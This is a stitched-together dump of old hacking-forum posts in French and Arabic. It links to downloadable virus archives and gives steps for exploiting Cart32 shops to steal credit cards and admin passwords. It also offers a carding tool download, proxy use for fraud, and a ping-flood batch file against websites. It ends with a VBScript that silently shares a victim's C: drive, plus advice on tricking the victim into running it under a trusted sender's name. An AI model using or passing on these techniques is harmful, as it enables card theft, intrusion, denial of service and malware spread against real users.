voici un site pour hacker http://rabathacker.siteperso.net
فايرس الحب
http://www.geocities.com/mmommn/loveletter.zip
فايرس مليسا
http://www.geocities.com/mmommn/melissa.zip
فايروسات اخري
http://www.geocities.com/mmommn/zerobug.zip
http://www.geocities.com/mmommn/groovie.zip
http://www.geocities.com/mmommn/******.zip
http://www.geocities.com/mmommn/gm.zip
http://www.geocities.com/mmommn/cih.zip
http://www.geocities.com/mmommn/ada.zip
http://www.geocities.com/mmommn/ussr-696.zip
http://www.geocities.com/mmommn/Win32.SKA.zip
http://www.geocities.com/mmommn/hooker.zip
http://www.geocities.com/mmommn/snooche.zip
http://www.geocities.com/mmommn/reject.zip
http://www.geocities.com/mmommn/psd2000.zip
http://www.geocities.com/mmommn/001.zip
http://www.geocities.com/mmommn/583virus.zip
http://www.geocities.com/mmommn/789.zip
http://www.geocities.com/mmommn/8tunes.zip
http://www.geocities.com/mmommn/911.zip
http://www.geocities.com/mmommn/abraxas.zip
http://www.geocities.com/mmommn/accessiv.zip
http://www.geocities.com/mmommn/acid.zip
http://www.geocities.com/mmommn/ada.zip
http://www.geocities.com/mmommn/agent.zip
http://www.geocities.com/mmommn/aids-c.zip
http://www.geocities.com/mmommn/alameda.zip
http://www.geocities.com/mmommn/anna.zip
http://www.geocities.com/mmommn/anthrax.zip
http://www.geocities.com/mmommn/antiexe.zip
http://www.geocities.com/mmommn/antipascal11.zip
http://www.geocities.com/mmommn/antiscan.zip
http://www.geocities.com/mmommn/armaged.zip
http://www.geocities.com/mmommn/zerobug.zip
ASSOC Affiche ou modifie les applications associées aux extensions de fichiers.
AT Planifie l'exécution de commandes ou programmes sur un ordinateur.
ATTRIB Affiche ou modifie les attributs d'un fichier.
BREAK Active ou désactive le contrôle étendu de CTRL+C.
CACLS Affiche ou modifie les listes de contrôles d'accès aux fichiers.
CALL Appelle un fichier de commandes depuis un autre fichier de commandes.
CD Modifie le répertoire ou affiche le répertoire en cours.
CHCP Modifie la page de code active ou affiche son numéro.
CHDIR Modifie le répertoire ou affiche le nom du répertoire en cours.
CHKDSK Vérifie un disque et affiche un relevé d'état.
CHKNTFS Affiche ou modifie la vérification du disque au démarrage.
CLS Efface l'écran.
CMD Lance une nouvelle instance de l'interpréteur de commandes de Windows.
COLOR Modifie les couleurs du premier plan et de l'arrière plan de la console.
COMP Compare les contenus de deux fichiers ou groupes de fichiers.
COMPACT Modifie ou affiche la compression des fichiers sur une partition NTFS.
CONVERT Convertit des volumes FAT en volumes NTFS. Vous ne pouvez pas convertir le lecteur en cours d'utilisation.
COPY Copie un ou plusieurs fichiers.
DATE Affiche ou modifie la date.
DEL Supprime un ou plusieurs fichiers.
DIR Affiche la liste des fichiers et des sous-répertoires d'un répertoire.
DISKCOMP Compare les contenus de deux disquettes.
DISKCOPY Copie le contenu d'une disquette sur une autre.
DOSKEY Modifie les lignes de commande, rappelle des commandes Windows, et permet de créer des macros.
ECHO Affiche des messages à l'écran ou active/désactive l'affichage des commandes.
ENDLOCAL Stoppe la localisation des modifications de l'environnement dans un fichier de commandes.
ERASE Supprime un ou plusieurs fichiers.
EXIT Quitte l'interpréteur de commandes (CMD.EXE).
FC Compare deux fichiers ou groupes de fichiers, et affiche les différences entre eux.
FIND Cherche une chaîne de caractères dans un ou plusieurs fichiers.
FINDSTR Cherche des chaînes de caractères dans un ou plusieurs fichiers.
FOR Exécute une commande sur chaque fichier d'un groupe de fichiers.
FORMAT Formate un disque pour utilisation avec Windows.
FTYPE Affiche ou modifie les types de fichiers utilisés dans les associations d'extensions.
GOTO Poursuit l'exécution d'un fichier de commandes à une ligne identifiée par une étiquette.
GRAFTABL Permet à Windows d'afficher un jeu de caractères en mode graphique.
HELP Affiche des informations sur les commandes de Windows.
IF Effectue un traitement conditionnel dans un fichier de commandes.
LABEL Crée, modifie ou supprime le nom de volume d'un disque.
MD Crée un répertoire.
MKDIR Crée un répertoire.
MODE Configure un périphérique du système.
MORE Affiche la sortie écran par écran.
MOVE Déplace un ou plusieurs fichiers d'un répertoire à un autre.
PATH Affiche ou définit le chemin de recherche des fichiers exécutables.
PAUSE Interrompt l'exécution d'un fichier de commandes et affiche un message.
POPD Restaure la valeur précédente du répertoire courant enregistré par PUSHD.
PRINT Imprime un fichier texte.
PROMPT Modifie l'invite de commande de Windows.
PUSHD Enregistre le répertoire courant puis le modifie.
RD Supprime un répertoire.
RECOVER Récupère l'information lisible d'un disque défectueux.
REM Insère un commentaire dans un fichier de commandes ou CONFIG.SYS.
REN Renomme un ou plusieurs fichiers.
RENAME Renomme un ou plusieurs fichiers.
REPLACE Remplace des fichiers.
RMDIR Supprime un répertoire.
SET Affiche, définit ou supprime des variables d'environnement Windows.
SETLOCAL Commence la localisation des changements de l'environnement dans un fichier de commandes.
SHIFT Modifie la position des paramètres remplaçables dans un fichier de commandes.
SORT Trie les éléments en entrée.
SUBST Affecte une lettre de lecteur à un chemin d'accès.
START Lance une fenêtre pour l'exécution du programme ou de la commande.
TIME Affiche ou définit l'heure de l'horloge interne du système.
TITLE Définit le titre de la fenêtre pour une session CMD.EXE.
TREE Représente graphiquement l'arborescence d'un lecteur ou d'un chemin.
TYPE Affiche le contenu d'un fichier texte.
VER Affiche le numéro de version de Windows.
VERIFY Indique à Windows s'il doit ou non vérifier que les fichiers sont écrits correctement sur un disque donné.
VOL Affiche le nom et le numéro de série du volume.
XCOPY Copie des fichiers et des arborescences de répertoires.
Dans cette rubrique, vous allez découvrir quelques programmes qui permettent de s'essayer au hacking; cependant, il est toujours bon de savoir qu'utiliser ce logiciel est prohibé par la loi ! Aussi, je pourai pas être tenus responsables de vos actes et leurs conséquences : ces programmes ne sont là qu'à titre informatif...
طريقة الحصول على بطاقات الإئتمان من خلال ثغرة Cart32.exe ...
----------------
بسم الله الرحمن الرحيم
1- لتصل لموقع يحوي برنامج Cart32.exe استعمل احدى محركات البحث مثل
http://www.google.com/ أو http://www.av.com/
والكلمة التي ستبحث عنها هي "Cart32.exe v3"
2- الثغرة تعمل في إحدى هذه النسخ :
v2.5 والثغرة به شبه مؤكدة .
v3.0 مثل السابق .
v3.5a قليل جدا .
v4.0 استحالة .
3- اذا كان الموقع باسم http://www.ardra.com/ فإن الثغرة ستكون هكذا على الأغلب :
http://www.ardra.com/......./catr32...rdra-ORDERS.log
أو
http://www.ardra.com/......./catr32...rdra-OUTPUT.log
وهذه الثغرة سوف تسمح لك بالحصول على جميع بطاقات الإئتمان التي يشترى بها من الموقع .
4- للحصول على كلمة مرور المدير من هذه الثغرة
www.ardra.com/......./cart32.ini
5- للحصول على معلومات العملاء :
/cart32clientlist
6- لرؤية مجلد الموقع :
/error
----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
برنامج سهل وبسيط من خلالة يمكنك الحصول على ارقام الفيز الموجودة فى البنوك المتوفرة فية
اترككم مع البرنامج
Download-Link
Posté le: Dim 18 Déc à 18:03
--------------------------------------------------------------------------------
برنامج سهل وبسيط من خلالة يمكنك الحصول على ارقام الفيز الموجودة فى البنوك المتوفرة فية
اترككم مع البرنامج
Download-Link
http://rapidshare.de/files/5988209/cardvisa.zip.html
IP est une adresse formée de 4 groupes de nombres. Toute machine connectée a internet possède une adresse ip.
Le fournisseur d'internet est capable de faire le lien entre l'ip et l'identité du possesseur de la machine.
Avant, les ip étaient fixes, maintenant, a chaque deconection et reconection l'ip change, sa s'apelle une ip dynamique.
L'ip sert a identifier un ordinateur sur la toile, pour permettre des communications avec un pc precis ect ...
L'adresse IP est aussi utilisée par les sites Web. Dans ce cas, c'est un serveur particulier, appelé DNS, qui fait le lien entre la série de nombres et l'URL de la forme http://www.monsite.com/.
L'ip est aussi utilisée pour identifier les hackeurs en cas d'un probleme, mais il prenne pratiquement toujours leurs precautions :
Les proxys :
Ce sont des Ip données par d'autres ordinateurs pour l'anonymité d'autres : Un server donne son ip comme proxy, si quelqun veux garder son anonymité sur internet, il l'utilise, son ip apparaitera donc comme celle du server, cette technique est utilisées pour les hacks ou les achats par cc piratées, pour ne pas se faire identifier et ne courrir aucun risque. Mais on ne peux pas etre anonyme tjr a 100%, il ya des facons de decrypter l'ip et se faire detectées, mais elle sont tres rarement utilisées.
Vous pouvez trouver de nombreux proxys sur internet, il y'a meme des site specialisés pour sa.
Pour utiliser un proxy vous appuiez sur 'outils' dans internet explorer, puis 'options internet', allez dans l'onglet 'connexions', choisissez la connection voulue dans la liste et appuiez sur 'parametres', cochez 'utiliser un server proxy pour cette connection(ces parametres ne s'appliquerons pas aux autres connections)' puis inserez l'adresse du proxy dans 'adresse' et le port utilisé dans 'port', et c'est fini, vous devez vous deconecter et vous reconecter pour prendre l'ip du proxy, pour etre sur de soi il vaut mieux verifier que le proxy marche, allez sur www.whatismyip.com et verifier que l'adresse ip donnée est celle du proxy.
السلام عليكم ورحمة الله وبركاته
هذه طريقه ممكن تكون جديده لضرب المواقع وفيها اختصارات للدوس
1) اذهب الى ابدأ START
2) ثم اذهب الى برامج PROGRAMS .
3) ثم اذهب الى MS-DOS prompt . (موجه الدوس)
4) اكتب edit 1.bat ثم اضغط ENTER (اكتب الجمله بالمسافات وبالضط)
5) بعدما تضغط ENETR ستأتيك شاشة زرقاء اكتب فيها مايلي
اكتب الموقع هنا ping -t-a-l-f1. bat
6) بعدها اضغط ALT ثم SAVE ثم ALT ثم EXIT .
9) عندما تخرج الى الدوس ماعليك سوى كتابة الرقم 1 ثم اضغط ENTER
ويبدا الدوس بضرب الموقع ويستمر الجهاز بارسال بينات الى ان تقوم انت باقفال الدوس ويمكنك تشغيل اكثر من MS-DOS prompt في نفس الوقت اتزيد كمية البيانات .
ملاحظه: اسم الموقع يكتب بدون www:
xxx.com
Set WshShell = CreateObject("WScript.Shell")
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Flags",770, "REG_DWORD"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Parmlenc", 6837, "REG_BINARY"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Parm2enc", 0, "REG_BINARY"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Path", "C:\"
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Remark",""
WshShell.RegWrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Network\LanMan\C$\Type", 0, "REG_DWORD"
Voila, ce fichier doit etre executé par la victime et c'est du tout cuit! Vous devez faire ensorte que la victime clike dessus, pour cela de nombreuses facons s'offrent a vous, la plus simple étant de lui envoyer en chattant avec lui, si il a confiance en vous, mais si il s'en rend compte que c'est vous qui avez pénétré son pc, a ce moment vous risquez d'avoir des problèmes, alors je vous conseille plutot de lui envoyer le fichier anonymement, en vous prenant pour quelqun d'autre, en lui envoyant le fichier de la part de quelqun dont il a confiance par exemple,avec un mailer anonyme.
Maintenant, debrouillez vous son adresse ip, et clikez avec le bouton droit sur "voisinage reseau", et puis sur "se connecter a un lecteur reseau", puis vous tappez \\IP.DE.LA.VICTIME\C$
Taraaa! vous êtes sur son pc! ne soyez pas méchant et n'abusez pas de cette faille, car je rapelle que le hack est un crime, et vous etes le seul responsable de ce que vos actes.